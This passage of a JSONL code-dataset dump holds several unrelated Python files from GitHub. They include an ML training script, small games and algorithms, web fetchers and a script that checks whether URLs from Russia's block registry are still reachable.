bounds=bounds)\n\n\n","repo_name":"sgubianpm/pyconie2022","sub_path":"thomson.py","file_name":"thomson.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"72056921962","text":"import momo\nimport numpy as np\nfrom math import *\nfrom __common__ import *\n\ndef max_idx( value, reference ):\n cur_idx = -1\n for i in xrange( len( reference ) ):\n if value >= reference[i]:\n cur_idx = i\n return cur_idx\n \n\ndef compute_feature( reference, frame, radius = 3 ):\n feature = np.array( [0.] * FEATURE_LENGTH, dtype = np.float32 )\n\n for i in xrange( len( frame ) ):\n rel_x = frame[i][:2] - reference[:2]\n l_x = np.linalg.norm( rel_x )\n\n n = rel_x / l_x\n e = frame[i][:2] / np.linalg.norm( frame[i][:2] )\n cos_phi = np.dot( -n, e )\n force = ( LAMBDA + 0.5 * ( 1 - LAMBDA ) * ( 1 + cos_phi ) ) * exp( 2 * radius - l_x ) \n i = max_idx( force, ANGLES )\n if force > 0.5:\n feature[max( i, 0 )] += 1\n return feature\n\n\n\n","repo_name":"dichodaemon/momo","sub_path":"python/momo/features/helbing/compute_feature.py","file_name":"compute_feature.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"26878956407","text":"#!/usr/bin/env python3\n\nimport os\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader, random_split\nimport pytorch_lightning as pl\nimport argparse\nimport yaml\nimport random\nimport numpy as np\nimport logging\nfrom waterfall import models\nfrom waterfall.utils import datapipe, datapipe_manual_ctc, datapipe_k2\nfrom waterfall.manual_ctc import eta_scheduler\nimport wandb\n\n\ndef main(args):\n cfg = yaml.load(open(args.config), Loader=yaml.loader.SafeLoader)\n pl.seed_everything(cfg['seed'], workers=True)\n\n batch_size = cfg['batch_size'] if args.batch_size == 0 else args.batch_size\n\n if cfg['loss'] == 'ctc':\n Dataset = datapipe.Dataset\n collate_fn = datapipe.collate_fn\n elif cfg['loss'] in ['ctc_fb', 'ctc_softmax']:\n Dataset = datapipe_manual_ctc.Dataset\n collate_fn = datapipe_manual_ctc.collate_fn\n elif cfg['loss'] in ['ctc_k2', 'k2']:\n Dataset = datapipe_k2.Dataset\n collate_fn = datapipe_k2.collate_fn_sorted\n\n if cfg['loss'] in ['ctc_k2', 'k2']:\n train_data = Dataset(args.train_set,\n args.lang_dir, token_type='phones')\n dev_data = Dataset(args.dev_set,\n args.lang_dir, token_type='phones')\n else:\n train_data = Dataset(args.train_set,\n args.lang_dir)\n dev_data = Dataset(args.dev_set,\n args.lang_dir)\n\n train_gen = DataLoader(train_data,\n batch_size=batch_size,\n shuffle=True,\n num_workers=cfg['num_workers'],\n persistent_workers=True,\n collate_fn=collate_fn)\n dev_gen = DataLoader(dev_data,\n batch_size=batch_size,\n shuffle=False,\n num_workers=cfg['num_workers'],\n persistent_workers=True,\n collate_fn=collate_fn)\n\n model = models.Wav2VecFineTuningDiverse(\n train_data.lang.num_nn_output, cfg=cfg, lang_dir=args.lang_dir)\n\n os.makedirs('exp/%s' % (args.name), exist_ok=True)\n model_checkpoint= pl.callbacks.ModelCheckpoint(monitor='valid_loss',\n save_top_k=1 if 'save_top_k' not in cfg.keys(\n ) else cfg['save_top_k'],\n every_n_epochs=1,\n filename='{epoch}-{valid_loss:.3f}',\n mode='min')\n callbacks = [model_checkpoint,\n pl.callbacks.LearningRateMonitor(logging_interval='step'),\n pl.callbacks.RichProgressBar(),\n pl.callbacks.RichModelSummary(max_depth=2)]\n\n if cfg['early_stopping']:\n callbacks.append(pl.callbacks.EarlyStopping(monitor='valid_loss',\n mode='min',\n patience=cfg['patience'],\n verbose=True))\n\n if 'auto_eta_scheduler' in cfg.keys() and cfg['auto_eta_scheduler']:\n callbacks.append(eta_scheduler.AutoEtaScheduler('valid_loss',\n delta_eta=cfg['delta_eta'],\n final_eta=cfg['final_eta'],\n patience=cfg['patience_eta'],\n verbose=True))\n\n accumulate_grad_batches = 1 # by default 1, args.accumulate_grad_batches has more priority than cfg['accumulate_grad_batches']\n if args.accumulate_grad_batches != 1:\n accumulate_grad_batches = args.accumulate_grad_batches\n elif 'accumulate_grad_batches' in cfg.keys():\n accumulate_grad_batches = cfg['accumulate_grad_batches']\n\n logger = pl.loggers.WandbLogger(\n project=args.name, save_dir='exp/%s' % (args.name))\n logger.watch(model, log='all')\n\n if args.checkpoint:\n if not args.load_weights_only:\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n resume_from_checkpoint=args.checkpoint,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n else:\n model.load_state_dict(torch.load(args.checkpoint)['state_dict'])\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n 
deterministic=False,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n else:\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n\n trainer.fit(model, train_gen, dev_gen)\n\n logger.log_metrics({'best_model_path': os.path.join(os.getcwd(), model_checkpoint.best_model_path),\n 'best_model_loss': model_checkpoint.best_model_score.item()})\n wandb.finish()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--train_set', help='Training set directory.', type=str)\n parser.add_argument('--dev_set', help='Dev set directory.', type=str)\n parser.add_argument('--lang_dir', help='Lang directory.', type=str)\n parser.add_argument('--config', help='Configuration file path.', type=str)\n parser.add_argument(\n '--name', help='Experiment name. Models will be stored in exp/$name/version*', type=str, default='ctc')\n parser.add_argument(\n '--gpus', help='Number of GPUs that used for training.', type=int, default=1)\n parser.add_argument(\n '--checkpoint', help='Resume from checkpoint.', type=str, default=None)\n parser.add_argument('--load_weights_only',\n help='Whether or not load weights only from checkpoint.', type=bool, default=False)\n parser.add_argument('--batch_size', help='The batch_size for training.', type=int, default=0)\n parser.add_argument(\n '--accumulate_grad_batches', help='The number of batches for gradient accumulation.', type=int, default=1)\n\n args = parser.parse_args()\n main(args)\n","repo_name":"ZhaoZeyu1995/Waterfall","sub_path":"waterfall/bin/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"13416865029","text":"# Imports the Google Cloud client library\nfrom google.cloud import translate\n\n# Instantiates a client\ntranslate_client = translate.Client()\n\ndef translate (text,target):\n\n translation = translate_client.translate(text, source_language = 'ja', target_language = target)\n return translation['translatedText']\n\n# The text to translate\n# text = u'です by Glamour'\n# The target language\n# target = 'pt'\n\n# Translates some text into Russian\n# translation = translate_client.translate(text, source_language = 'ja', target_language = target)\n\n#translate_client.get\n\n# print(u'Text: {}'.format(text))\n# print(u'Translation: {}'.format(translation['translatedText']))\n","repo_name":"rovanemoura/DESU-by-Glamour","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"38563579519","text":"# Kelime Tahmin Oyunu\n# Önce rastgele bir kelime seçilecek (Bu bir fonksiyon olsun. Bir listenin içinden rastgele bir kelime seçip versin)\n# Kaç haklı oynamak istediğini oyuncuya soracak. 1 ile 25 arasında bir sayı seçmesi sağlanacak. Buna HakSayısı diyelim.\n# Rastgele seçilen Kelimenin harf sayısı kadar ekrana ****** basılacak.\n# ve Oyuncuya \"Tahminini gir\" diyecek. Bir harf girmek dışındaki girişlerde \"hatalı giriş yaptın\" diyecek.\n# Girilen harf, kelienin içinde varsa onu görünür yapacak. \"Tebrikler bir harf bildin. Kelime = ****A** \" gibi bir mesaj vrecek\n# Harf hatalı ise hakSayısından düşecek. Hak sayısı sıfır olunca \"KAYBETTİN\" mesajıyla oyun bitecek.\n# Tahmin hakları bitmeden kelimeyi bilirse \"TEBRİKLER KAZANDIN\" mesajı ile oyun bitecek.\n# kulanılacak kütüphane random\n# mesela 1 ile 20 arasında rastgele bir sayı üretecek fonksiyon : randint(0,19)\n#\n# Her seferinde ekrana yıldızlı yazdırmak için ipucu :\n# Tahmin girildiğinde, eğer girilen harf kelimenin içinde varsa bu harfi bulunanlar adlı bir diziye atarız\n# kelimenin eleman sayısını len() ile buluruz.\n# Bir döngüde her bir harf için şunu yaparız; bu harf bulunanlar dizisinde varsa harfin kendisini yazarız, yoksa * yazarız.\n# En sonunda,\nimport random\n\n#rastgele bir kelime bulma fonksiyonu\ndef KelimeSec():\n kelimeler = ['masa','kalemkutu','makas','ev','koyun','armut','kiraz','dolap','balina', \"berat\"]\n sayı = random.randint(0,len(kelimeler)-1)\n secim = kelimeler[sayı].lower()\n return secim\n\n\n\n#tahmin edilecek kelimeyi yıldızlar halinde yazar. Bulunan harfleri yerlerine yerleştirir.\ndef EkranaYaz(kelime,liste):\n yazılacak = \"\"\n for harf in kelime:\n if (harf in liste):\n yazılacak = yazılacak + harf\n else:\n yazılacak = yazılacak + \"*\"\n\n print(\"KELİME = \"+yazılacak)\n\n return yazılacak\n\n#giriş ekranını gösteren fonksiyon\ndef GirisEkranı():\n print(\"-----KELİME TAHMİN OYUNUNA-----\"\"\\n\"\n \"-----------HOŞGELDİNİZ---------\"\"\\n\"\n \"-------------------------------\"\"\\n\")\n\n# burada, kullanıcı doğru bir seçim girene kadar soruluyor\ndef OyunHakSayısı():\n hak = 0\n while True:\n try:\n hak = int(input(\"Kaç haklı oynamak istersiniz.\"))\n except:\n print(\"Hatalı giriş yaptınız\")\n continue\n if (hak > 25 or hak < 0):\n print(\"HATALI SEÇİM (1 ile 25 arasında seçim yapın) \")\n continue\n else:\n break\n return hak\n\n\n\n# Programın ana bölümü\n\nGirisEkranı()\n\nkelime = KelimeSec()\n\nuzunluk = len(kelime)\n\nbulunan_harfler = []\n\noyunhakkı = OyunHakSayısı()\n\nprint(\"*\" * uzunluk)\n\nwhile True:\n\n harf = input(\"Harf tahmin edin\")\n harf = harf.lower()\n if(harf in kelime):\n if(harf not in bulunan_harfler):\n bulunan_harfler.append(harf)\n else:\n oyunhakkı = oyunhakkı - 1\n print(\"{} hakkınız kaldı. \".format(oyunhakkı))\n\n if (oyunhakkı == 0):\n print(\"Oyunu kaybettin\")\n quit()\n\n ekranaYazılan = EkranaYaz(kelime,bulunan_harfler)\n\n# eğer tüm harfler bulundu ise kazandın deyip oyunu bitirsin\n if(kelime == ekranaYazılan):\n print(\"Oyunu kazandınız TEBRİKLER\")\n quit()\n\n\n\n\n","repo_name":"hasanlacin/Berat-Projeler","sub_path":"Kelime Tahmin Oyunu.py","file_name":"Kelime Tahmin Oyunu.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"4216976168","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\ndef algorithm(number1, number2):\n m = number1\n n = number2\n start = True\n while(start):\n t = m // n\n r = m - n * t\n if r == 0:\n print(\"Наибольшим числителем для {} и {} есть {}\".format(number1, number2 , n))\n start = False\n else:\n m = n\n n = r\n\n","repo_name":"MaxAlekseevDev/Algorithms","sub_path":"Euclid_algorithm.py","file_name":"Euclid_algorithm.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"24237968283","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom enum import Enum, unique\nimport urllib.request\n\n\n@unique\nclass Category(Enum):\n Android = '5562b410e4b00c57d9b94a92' # 安卓\n Frontend = '5562b415e4b00c57d9b94ac8' # 前端\n IOS = '5562b405e4b00c57d9b94a41' # iOS\n Backend = '5562b419e4b00c57d9b94ae2' # 后端\n Design = '5562b41de4b00c57d9b94b0f' # 设计\n Product = '569cbe0460b23e90721dff38' # 产品\n Freebie = '5562b422e4b00c57d9b94b53' # 工具资源\n Article = '5562b428e4b00c57d9b94b9d' # 阅读\n AI = '57be7c18128fe1005fa902de' # 人工智能\n All = 'all'\n\n\nARTICLETYPE = {\n 'hot': 'https://timeline-merger-ms.juejin.im/v1/get_entry_by_rank',\n 'new': 'https://timeline-merger-ms.juejin.im/v1/get_entry_by_timeline',\n}\n\n\ndef get_juejin(limit=20, category=Category.All, article_type='hot', src='sixgold'):\n if article_type == 'hot':\n url = ARTICLETYPE['hot']\n else:\n url = ARTICLETYPE['new']\n\n req_url = '%s?src=%s&limit=%s&category=%s' % (url, src, limit, category.value)\n\n def make_request():\n with urllib.request.urlopen(req_url) as f:\n yield f.read()\n\n yield from make_request()\n\nif __name__ == '__main__':\n for i in get_juejin(limit=5, category=Category.AI, article_type='new', src='sixgold'):\n print(i.decode('utf-8'))\n print(\"\\n\")","repo_name":"kobelover/juejin","sub_path":"juejin.py","file_name":"juejin.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"42002494260","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Импорты Python\nimport time, sys, threading, signal, ipaddress, gc, configparser, sqlite3, os\n\n# Сторонние пакеты\nimport requests\n\n# Наш конфигурационный файл\nconfig = configparser.ConfigParser()\nconfig.read('/etc/roskom/tools.ini')\n\n# База данных\ndb = sqlite3.connect(config['roskomtools']['database'])\n\n# Создадим таблицы результатов проверок\ncursor = db.cursor()\ncursor.execute(\"CREATE TABLE IF NOT EXISTS checks (check_id INTEGER PRIMARY KEY AUTOINCREMENT, check_when INTEGER, check_total INTEGER, check_available INTEGER, check_minutes INTEGER, check_seconds INTEGER, check_maxrss INTEGER)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS available_links (link_check_id INTEGER, link_when INTEGER, link_url TEXT)\")\ncursor.close()\ndb.commit()\n\n# Общи�� модули\nsys.path.append('/usr/share/roskomtools')\nimport rknparser\n\n# Время начала работы скрипта\nexecution_start = time.time()\n\n# Расставим затычки-мьютексы\nin_mutex = threading.Lock()\nout_mutex = threading.Lock()\n\n# Прикинемся браузером\nrequest_headers = {\n\t'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/49.0.2623.108 Chrome/49.0.2623.108 Safari/537.36',\n}\n\n# Текст для поиска в ответе\nsearch_text = config['check']['search_text'].encode('utf-8')\n\n# Счётчик обработанных ссылок (для отображения прогресса)\ncounter = 0\n\n# Наш воркер\nclass Worker(threading.Thread):\n\tdef __init__(self, thread_id, in_data, out_data, trace):\n\t\tthreading.Thread.__init__(self),\n\t\tself.thread_id = thread_id\n\t\tself.in_data = in_data\n\t\tself.out_data = out_data\n\t\tself.timeout = 3\n\t\tself.iter_count = 0\n\t\tself.total_count = len(in_data)\n\t\tself.trace = trace\n\n\tdef select_unprocessed(self):\n\t\twith in_mutex:\n\t\t\ttry:\n\t\t\t\tresult = self.in_data.pop()\n\t\t\texcept:\n\t\t\t\tresult = None\n\t\t\treturn result\n\n\tdef report_progress(self, item):\n\t\tglobal counter\n\t\tcounter += 1\n\t\tprint(u\"(%d of %d) [%s] %s\" % (counter, self.total_count, item['status'], item['url']))\n\n\tdef process_item(self, item):\n\t\tglobal request_headers, search_text\n\t\titem['checked'] = int(time.time())\n\n\t\ttry:\n\t\t\tresponse = requests.get(item['url'], timeout = self.timeout, stream = True, headers = request_headers)\n\t\t\tcontent = response.raw.read(10000, decode_content = True)\n\n\t\t\tif search_text in content:\n\t\t\t\titem['status'] = 'blocked'\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tpeer = response.raw._connection.sock.getpeername()\n\t\t\t\texcept:\n\t\t\t\t\titem['status'] = 'available'\n\t\t\t\telse:\n\t\t\t\t\tif peer is not None:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\taddress = ipaddress.ip_address(peer[0])\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\titem['status'] = 'available' # ???\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif address.is_private:\n\t\t\t\t\t\t\t\titem['status'] = 'local-ip'\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\titem['status'] = 'available'\n\t\t\t\t\telse:\n\t\t\t\t\t\titem['status'] = 'available'\n\t\texcept Exception as e:\n\t\t\titem['status'] = 'failure'\n\n\t\twith out_mutex:\n\t\t\tif self.trace:\n\t\t\t\tself.report_progress(item)\n\t\t\tself.out_data.append(item)\n\n\t\tself.iter_count += 1\n\t\tif (self.iter_count % 100) == 0:\n\t\t\tgc.collect()\n\n\tdef set_timeout(self, new_timeout):\n\t\tself.timeout = new_timeout\n\n\tdef run(self):\n\t\twhile True:\n\t\t\titem = self.select_unprocessed()\n\t\t\tif item is 
None:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tself.process_item(item)\n\n# Профилирование\nimport resource\n\ndef signal_handler(signal, frame):\n\tprint(\"Aborted by signal, exitting.\")\n\texit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\nsignal.signal(signal.SIGTERM, signal_handler)\nsignal.signal(signal.SIGQUIT, signal_handler)\n\nprint(\"Starting using %d threads\" % (int(config['check']['threads']),))\n\ntry:\n\tprint(\"Loading data...\")\n\tin_data = rknparser.load_urls(db)\n\tout_data = []\nexcept:\n\tprint(\"Failed to load data. Run rkn-load.py to load the registry and rkn-parse.py to parse it.\")\n\texit(-1)\n\nprint(\"Loading succeeded, starting check\")\n\n# Инициализируем наши рабочие потоки\nthreads = {}\nfor i in range(int(config['check']['threads'])):\n\tthreads[i] = Worker(i, in_data, out_data, True)\n\tthreads[i].set_timeout(int(config['check']['http_timeout']))\n\tthreads[i].setDaemon(True)\n\n# Разветвляемся\nfor index, thread in threads.items():\n\tthread.start()\n\n# Соединяемся\nfor index, thread in threads.items():\n\tthread.join()\n\n# На этом этапе у нас сформирована статистика в массиве out_data, получим данные для внесения в БД\ntimestamp = int(time.time())\ntotal_count = len(out_data)\navailable = [i for i in out_data if i['status'] == 'available']\n#unavailable = [i for i in out_data if i['status'] in ['blocked', 'failure', 'local-ip']]\navailable_count = len(available)\n\n# Предварительная оценка ресурсов для записи в лог\nstat = resource.getrusage(resource.RUSAGE_SELF)\n\n# Время окончания работы скрипта\nexecution_end = time.time()\nexecution_time = execution_end - execution_start\nexecution_minutes = int(execution_time / 60)\nexecution_seconds = (execution_time - (execution_minutes * 60))\n\n# Сохраним результат в БД\ncursor = db.cursor()\ndata = (timestamp, total_count, available_count, execution_minutes, execution_seconds, stat.ru_maxrss)\ncursor.execute(\"INSERT INTO checks (check_when, check_total, check_available, check_minutes, check_seconds, check_maxrss) VALUES (?, ?, ?, ?, ?, ?)\", data)\ncheck_id = cursor.lastrowid\nfor link in available:\n\tdata = (check_id, link['checked'], link['url'])\n\tcursor.execute(\"INSERT INTO available_links (link_check_id, link_when, link_url) VALUES (?, ?, ?)\", data)\ncursor.close()\ndb.commit()\n\nif os.isatty(sys.stdin.fileno()):\n\twith open('result.txt', 'w') as f:\n\t\tfor link in available:\n\t\t\tf.write(\"%s <%d>\\n\" % (link['url'], link['checked']))\n\n\tprint(\"---\\nCheck finished in %dm:%.2fs using %d kb RES\\nAvailable: %d, not available: %d\" % (execution_minutes, execution_seconds, stat.ru_maxrss, available_count, total_count - available_count))\n","repo_name":"orgtechservice/roskomtools","sub_path":"rkn-check/usr/bin/rkn-check.py","file_name":"rkn-check.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"33333794403","text":"\"\"\"\n问题描述:给定一个double类型的数组arr,其中的元素可正、可负、可0,返回子数组累乘的最大\n乘积。\n\n例如:\narr=[-2.5,4,0,3,0.5,8,-1],子数组[3,0.5,8]累乘可以获得最大的乘积12,所以返回12.\n\"\"\"\n\n\nclass SubArrMaxSum:\n @classmethod\n def get_max_sum(cls, arr):\n if not arr:\n return\n\n if len(arr) == 1:\n return arr[0]\n\n pre_max = arr[0]\n pre_min = arr[0]\n res = arr[0]\n\n for i in range(1, len(arr)):\n end_max = pre_max * arr[i]\n end_min = pre_min * arr[i]\n\n pre_max = max([arr[i], end_max, end_min])\n pre_min = min([arr[i], end_max, end_min])\n\n res = max([res, pre_max])\n\n return res\n\n\nif __name__ == '__main__':\n my_arr = [-2.5, 4, 0, 3, 0.5, 8, -1]\n print(SubArrMaxSum.get_max_sum(my_arr))\n","repo_name":"ResolveWang/algorithm_qa","sub_path":"arrandmatrix/q19.py","file_name":"q19.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"zh","doc_type":"code","stars":86,"dataset":"github-code","pt":"19"}
+{"seq_id":"43465308279","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 14:57:48 2019\r\n\r\n@author: Yahir F. Rivas\r\n\"\"\"\r\n\r\n# Starting point for program to build and draw a maze\r\n# Modify program using disjoint set forest to ensure there is exactly one\r\n# simple path joiniung any two cells\r\n# Programmed by Olac Fuentes\r\n# Last modified March 28, 2019\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\nimport time\r\n\r\ndef draw_maze(walls,maze_rows,maze_cols,cell_nums=False):\r\n fig, ax = plt.subplots()\r\n for w in walls:\r\n if w[1]-w[0] ==1: #vertical wall\r\n x0 = (w[1]%maze_cols)\r\n x1 = x0\r\n y0 = (w[1]//maze_cols)\r\n y1 = y0+1\r\n else:#horizontal wall\r\n x0 = (w[0]%maze_cols)\r\n x1 = x0+1\r\n y0 = (w[1]//maze_cols)\r\n y1 = y0 \r\n ax.plot([x0,x1],[y0,y1],linewidth=1,color='k')\r\n sx = maze_cols\r\n sy = maze_rows\r\n ax.plot([0,0,sx,sx,0],[0,sy,sy,0,0],linewidth=2,color='k')\r\n if cell_nums:\r\n for r in range(maze_rows):\r\n for c in range(maze_cols):\r\n cell = c + r*maze_cols \r\n ax.text((c+.5),(r+.5), str(cell), size=10,\r\n ha=\"center\", va=\"center\")\r\n ax.axis('off') \r\n ax.set_aspect(1.0)\r\n\r\ndef wall_list(maze_rows, maze_cols):\r\n # Creates a list with all the walls in the maze\r\n w =[]\r\n for r in range(maze_rows):\r\n for c in range(maze_cols):\r\n cell = c + r*maze_cols\r\n if c!=maze_cols-1:\r\n w.append([cell,cell+1])\r\n if r!=maze_rows-1:\r\n w.append([cell,cell+maze_cols])\r\n return w\r\n\r\ndef find(S,i):\r\n # Returns root of tree that i belongs to\r\n if S[i]<0:\r\n return i\r\n return find(S,S[i])\r\n\r\ndef find_c(S,i): #Find with path compression \r\n if S[i]<0: \r\n return i\r\n r = find_c(S,S[i]) \r\n S[i] = r \r\n return r\r\n\r\nplt.close(\"all\") \r\nmaze_rows = 10\r\nmaze_cols = 15\r\n\r\n\r\ndef DisjointSetForest(size):\r\n return np.zeros(size,dtype=np.int)-1 \r\n\r\ndef numSets(S): #return the number of sets\r\n count = 0\r\n for i in S:\r\n if i < 0: #if it is -1 then it is a root so add 1\r\n count += 1\r\n return count\r\n\r\ndef union(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n ri = find(S,i) \r\n rj = find(S,j)\r\n if ri!=rj:\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\ndef union_c(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n # Uses path compression\r\n ri = find_c(S,i) \r\n rj = find_c(S,j)\r\n if ri!=rj:\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\nplt.close(\"all\")\r\n\r\ndef countSets(S):\r\n\tc = 0\r\n\tfor i in S:\r\n\t\tif i==-1:\r\n\t\t\tc+=1\r\n\treturn c \r\n\r\ndef unionSize(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n # Uses path compression\r\n ri = find_c(S,i) \r\n rj = find_c(S,j)\r\n if ri!=rj: #if different root\r\n if S[ri] > S[rj]: #if ri is bigger than rj then rj goes to ri\r\n S[rj] += S[ri]\r\n S[ri] = rj\r\n return True\r\n else:\r\n S[ri] += S[rj] #if rj is bigger than ri then ri goes to rj\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\nmaze_rows = 10\r\nmaze_cols = 15 \r\nwalls = wall_list(maze_rows,maze_cols)\r\n\r\ndraw_maze(walls,maze_rows,maze_cols,cell_nums=True) \r\n\r\nS = DisjointSetForest(maze_rows*maze_cols)#use a dsf to create maze\r\n'''\r\nstart = time.time()\r\nwhile countSets(S) > 1: \r\n d = random.randint(0,len(walls)-1)\r\n if union(S,walls[d][0],walls[d][1]): #if they are in different sets\r\n walls.pop(d) #remove wall\r\nend = time.time() \r\nrt = end - start\r\nprint(\"The running time for standard union is: \", 
rt ) \r\n\r\n'''\r\nstart = time.time()\r\nwhile countSets(S) > 1:\r\n d = random.randint(0,len(walls)-1)\r\n if union_c(S,walls[d][0],walls[d][1]):#if they are in different sets\r\n walls.pop(d)#remove wall\r\nend = time.time() \r\nrt = end - start\r\nprint(\"The running time for compression is: \", rt ) \r\n \r\n \r\n'''\r\nfor i in range(len(walls)//2): #Remove 1/2 of the walls \r\n d = random.randint(0,len(walls)-1)\r\n print('removing wall ',walls[d])\r\n walls.pop(d)\r\n'''\r\nplt.close(\"all\")\r\n\r\ndraw_maze(walls,maze_rows,maze_cols) \r\n","repo_name":"yfrivas/CS2302","sub_path":"Lab6.py","file_name":"Lab6.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3418914962","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nimport openood.utils.comm as comm\nfrom openood.losses import soft_cross_entropy\nfrom openood.utils import Config\n\nfrom .lr_scheduler import cosine_annealing\n\n\ndef prepare_mixup(batch, alpha=1.0, use_cuda=True):\n \"\"\"Returns mixed inputs, pairs of targets, and lambda.\"\"\"\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1\n\n batch_size = batch['data'].size()[0]\n if use_cuda:\n index = torch.randperm(batch_size).cuda()\n else:\n index = torch.randperm(batch_size)\n\n return index, lam\n\n\ndef mixing(data, index, lam):\n return lam * data + (1 - lam) * data[index]\n\n\nclass MixupTrainer:\n def __init__(self, net: nn.Module, train_loader: DataLoader,\n config: Config) -> None:\n\n self.net = net\n self.train_loader = train_loader\n self.config = config\n self.alpha = self.config.trainer.trainer_args.alpha\n\n self.optimizer = torch.optim.SGD(\n net.parameters(),\n config.optimizer.lr,\n momentum=config.optimizer.momentum,\n weight_decay=config.optimizer.weight_decay,\n nesterov=True,\n )\n\n self.scheduler = torch.optim.lr_scheduler.LambdaLR(\n self.optimizer,\n lr_lambda=lambda step: cosine_annealing(\n step,\n config.optimizer.num_epochs * len(train_loader),\n 1,\n 1e-6 / config.optimizer.lr,\n ),\n )\n\n def train_epoch(self, epoch_idx):\n self.net.train()\n\n loss_avg = 0.0\n train_dataiter = iter(self.train_loader)\n\n for train_step in tqdm(range(1,\n len(train_dataiter) + 1),\n desc='Epoch {:03d}: '.format(epoch_idx),\n position=0,\n leave=True,\n disable=not comm.is_main_process()):\n batch = next(train_dataiter)\n\n # mixup operation\n index, lam = prepare_mixup(batch, self.alpha)\n data_mix = mixing(batch['data'].cuda(), index, lam)\n soft_label_mix = mixing(batch['soft_label'].cuda(), index, lam)\n\n # forward\n logits_classifier = self.net(data_mix)\n loss = soft_cross_entropy(logits_classifier, soft_label_mix)\n\n # backward\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n\n # exponential moving average, show smooth values\n with torch.no_grad():\n loss_avg = loss_avg * 0.8 + float(loss) * 0.2\n\n metrics = {}\n metrics['epoch_idx'] = epoch_idx\n metrics['loss'] = loss_avg\n\n return self.net, metrics\n","repo_name":"Jingkang50/OpenOOD","sub_path":"openood/trainers/mixup_trainer.py","file_name":"mixup_trainer.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"19"}
+{"seq_id":"16624151939","text":"\"\"\"\nCreate a function that returns the sum of the two lowest positive numbers given an array of minimum 4 integers. No floats or empty arrays will be passed.\n\nFor example, when an array is passed like [19, 5, 42, 2, 77], the output should be 7.\n\n[10, 343445353, 3453445, 3453545353453] should return 3453455.\n\nHint: Do not modify the original array.\n\"\"\"\n\nclass Solution():\n def sum_two_smallest_numbers(self, numbers):\n numbers.sort()\n _len = len(numbers)\n i = 0\n while i < _len and numbers[i] < 1:\n i += 1\n\n if i < _len - 1:\n return numbers[i] + numbers[i + 1]\n\ndef main():\n print(Solution().sum_two_smallest_numbers([19, 5, 42, 2, 77])) # 7\n print(Solution().sum_two_smallest_numbers([-19, 5, 42, 2, 77])) # 7\n\n\nif __name__ == '__main__':\n main()","repo_name":"dbconfession78/interview_prep","sub_path":"code_wars/0001_sum_of_two_smallest_positive_integers.py","file_name":"0001_sum_of_two_smallest_positive_integers.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
